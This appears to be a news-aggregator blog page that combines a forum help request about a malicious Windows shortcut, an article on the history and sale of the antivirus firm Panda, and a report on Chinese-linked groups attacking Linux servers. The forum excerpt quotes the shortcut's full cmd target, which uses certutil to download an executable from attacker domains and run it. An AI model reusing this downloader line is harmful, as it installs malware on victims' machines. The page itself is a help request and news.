Featured Post

.Lnk file with cmd usage - Virus, Trojan, Spyware, and Malware Removal Help - BleepingComputer

Image
.Lnk file with cmd usage - Virus, Trojan, Spyware, and Malware Removal Help - BleepingComputer.Lnk file with cmd usage - Virus, Trojan, Spyware, and Malware Removal Help - BleepingComputerPosted: 06 Jul 2020 11:33 AM PDT Hi all,Looking for feedback on the likelihood my double clicking of a bad .lnk file caused damage.. When I did double click it, I remember getting a standard windows dialog box. I believe it said the path did not exist or shortcut unavailable.. I'm not finding anything in my startup folder for C:\programdata or my username appdata startup folder...  I ran scans with malwarebytes, Hitman with no results.The .lnk file target was:%ComSpec% /v:on/c(SET V4=/?8ih5Oe0vii2dJ179aaaacabbckbdbhhe=gulches_%PROCESSOR_ARCHITECTURE% !H!&SET H="%USERNAME%.exe"&SET V4adKK47=certutil -urlcache -f https://&IF NOT EXIST !H! (!V4adKK47!izub.fun!V4!||!V4adKK47!de.charineziv.com!V4!&!H!))>nul 2>&1The .lnk file 'start-in' was:"%APPDATA%\Mic…

The history of Panda, startups since 1990 - Explica

The history of Panda, startups since 1990 - Explica


The history of Panda, startups since 1990 - Explica

Posted: 19 Mar 2020 12:00 AM PDT

His company started when undertaking in Spain in the technology sector was not in fashion. Neither was it one of the most important times for the country's economy, which was already approaching an economic crisis of international contagion and which ended up exploding in the country three years later. It was 1990 and Mikel Urizarbarrena from Bilbao founded Panda, an internet security company at a time when its use was not massive, but it was beginning to take off. Half a million old pesetas to found a company that 30 years later has been sold to the international firm WatchGuard Technologies for, according to the sector, about 200 million euros.

The announcement was made at noon on Monday, without much noise as was customary for the Spanish security firm. Nor without many details of the agreement between both parties on the bases on which the acquisition will be signed: will the company keep its employees in Bilbao and, therefore, its headquarters? Almost 600 employees are managed by the company in its 180 countries and 16 subsidiaries. What will be the future of the business? Pending the competition authorization, the situation remains pending.

Nor was it a surprise to the ecosystem; Panda had been pointed out since the beginning of the month under the "for sale" sign. They were looking for, if at that time they didn't already have it, potential buyers mainly in the United States. Said and done. With a turnover of 60 million euros in 2018 – the latest figures registered – and a valuation that does not exceed 300 million euros, it has been one of the most powerful companies in the sector in Seattle that has won the award.

Undertaking under the culture of the official

"An Eurosoft engineer had to explain to me what viruses were," Urizarbarrena told Entrepreneurs a few years ago. From that first explanation to have the eye to found the first and most successful Spanish antivirus company in Spain, only a few notions were missing. It only took him 10 years to conquer abroad and the cradle of computing, the United States, to position his company.

The truth is that the first years of Panda did not give the great covers that, seen since 2020, a company of that caliber could achieve. His first Artemis antivirus was not so interesting in a society that lived disconnected in the networks; Later versions, until reaching the native proposal for the forgotten Windows 95, were growing in their own ecosystem.

He was fighting against what he said in the delivery of the 2004 Entrepreneur Awards – of which he was the winner – "the culture of civil servants" but without the current aura of great entrepreneurs.

Already at the beginning of the millennium, and with the bursting of the dot-com bubble in tow – the same one that brought Terra and Jazztel ahead – the debate of the first entrepreneurs sounds – 20 years later – like an eternal litany. "To innovate and succeed you don't need money, but forcefulness and courage", ABC collected from the founder's hands in the same among the awards. Today, that phrase, and with valuations to startups that are already considered far above reality, is still very much alive.

Old school, but also with an eye on investors

To say that Panda did not rub shoulders with investors, in the same way that now the big – and small – tech companies are closing rounds worth millions of euros, would be unfair to their history.

Starting in 2005, with the shadow of large international companies tackling increasingly necessary cybersecurity and the credibility crisis of the technology sector – which, despite everything, had the same flaws as the rest of traditional companies – began to encounter trouble growing up. They were small and did not have the capital to face their competitors.

Its future happens to be in the hands of an international company in one of the most relevant sales in recent years

Organic or massive growth via investors? This question resonated with Panda for two years, until in 2007, the company's founder made 75% of it available to two investment funds. Investindustrial and Gala Capital, for 100 million euros would mark a before and after in the Urizarbarrena venture.

At this point, the era of horribilis for Panda would begin when it comes to management. The one that earned him the nickname of the damn company for CEOs. While Urizarbarrena had a small percentage in Panda and was relegated to an honorary position, Javier Dinarés took position. Juan Santana followed and, in 2011, José Sancho. This premiered his mandate in one of the worst moments of the company. After years without meeting objectives and, again in the middle of an international economic crisis devastating for Spain, Panda announced a change of venue and the dismissal of 128 employees under an Employment Regulation File (ERE); those that were so much replicated in companies in all sectors in those years. With a general strike and 28% of the drop in sales, it was not the first days of work for the manager. Which has also been encouraged by

Sancho, in any case, did not last as long at Panda. It was followed by Fernando García Checa and, in 2018, Juan Santamaría would address the last stage of Panda focused on the Internet of Things, the cloud and international growth, all subscribed with a new image renewed since its creation. The last to join the family of the security company at the advisory level enjoyed a high position – and a sign of the power and influence of Panda – in the ecosystem, the former Minister of Finance Pedro Solves and who was president of Telefónica Luis Miguel Gilpérez.

From its headquarters in Bilbao, but with 16 locations, the one 30 years ago it was a small internet security company, a stranger at the time, has managed to be positioned in 4th place in EDR (Endpoint Detection and Response) and occupy 10% of the world market share.

Now, its future is in the hands of an international company in one of the most relevant sales in recent years, but with little noise.

Hackers Have Targeted Linux Servers for Years: Report - BankInfoSecurity.com

Posted: 08 Apr 2020 01:38 PM PDT

Cybercrime , Fraud Management & Cybercrime , Next-Generation Technologies & Secure Development

BlackBerry Researchers Say Servers at Data Centers Worldwide Hit
Hackers Have Targeted Linux Servers for Years: Report

For nearly a decade, five hacking groups with apparent links to the Chinese government have targeted vulnerable Linux servers that make up the backend IT infrastructure of thousands of companies and organizations around the world, according to a research report from BlackBerry.

Since at least 2012, these hacking groups have targeted a wide array of industries that use Linux servers within their data center operations, BlackBerry reports. The goal is to steal intellectual property and other valuable data.

See Also: Role of Deception in the 'New Normal'

Because Linux servers support the backend operations of many large enterprises, they often store intellectual property, trade secrets and lists of employee usernames and passwords, according to the report.

Linux operating systems power about 98 percent of the world's supercomputers, according to a 2020 study by the Linux Foundation. For organization that store data in the cloud, about 75 percent of the infrastructure is composed of Linux servers, the same study showed.

Open Source Security

The hacking group campaigns that BlackBerry describes scan the internet for vulnerable or unpatched Linux severs, including those systems that use open source operating systems from vendors such as Red Hat Enterprise, CentOS and Ubuntu Linux, according to the report.

Once the attackers gain a foothold, they plant malware, including backdoors and kernel rootkits, which enables them to exfiltrate the data they want to steal, the report notes.

"This research paints a picture of an espionage effort targeting the very backbone of large organizations' network infrastructure that is more systemic than has been previously acknowledged," John McClurg, the CISO of BlackBerry, notes in the report.

The report does not identify which organizations have been targeted by this campaign.

Target: Linux

Because many Linux web servers handle large amounts of traffic each day, it's relatively easy for attackers to hide exfiltrated data within this volume of legitimate traffic, according to the report.

And because most security firms focus their attention on Windows systems or user-facing devices such as laptops and smartphones, Linux server vulnerabilities are sometimes forgotten or overlooked, the report notes.

"Linux's command-line interface also makes it less widely accessible, which means it is usually administered by a smaller number of skilled systems administrators," according to the report. "In contrast, practically everyone from the corner office to the mailroom uses desktop computers running either Windows or macOS, so most security companies have focused more of their research and development on products for the front office as opposed to the server rack."

As a result, hacking groups have repeatedly used the same methods to compromise Linux severs, the BlackBerry researchers note.

For example, the researchers discovered two, kernel-level rootkits that rendered the executables used in these attacks difficult to detect. And these toolsets appear to have been used for several years with few changes, the report notes.

"The fact that this Linux malware toolset has been in the wild for the better part of the last decade without having been detected and publicly documented prior to this report makes it highly probable that the number of impacted organizations is significant and the duration of the infections lengthy," the Blackberry researchers report.

Five Related Groups

The BlackBerry report states that at least five hacking groups appear to have played a role in this long-running campaign. The researchers, however, note that these groups all appear to be related to an umbrella organization called the Winnti Group.

According to a 2018 report by security firm ProtectWise, the Winnti Group, which also goes by the names PassCV, APT17, Axiom, LEAD, Barium, Wicked Panda and GREF, has ties to Chinese intelligence and is known to use code-signing certificates to target organizations with the goal of stealing data or spying on individuals (see: Report: Chinese Actors Steal Code-Signing Certificates).

Blackberry says the five hacking groups described in the report comprise civilian contractors who apparently are working in the interest of the Chinese government. These hacking groups share their tools, techniques, infrastructure and targeting information with each other as well as their government counterparts, according to the report.

Over the last several months, the U.S. government has attempted to shine more light on the hacking activities - including the theft of intellectual property - of groups tied to the Chinese government. In February, the U.S. Department of Justice indicted four members of China's People's Liberation Army for allegedly hacking Equifax in 2017 and stealing the personal data of over 145 million Americans as well as a vast trove of the company's trade secrets and intellectual property (see: 4 in Chinese Army Charged With Breaching Equifax ).

Comments

Popular Posts

System detected an overrun of a stack-based buffer in this application [FIX] - Windows Report

Valorant anti-cheat lead answers many questions on Reddit - Millenium US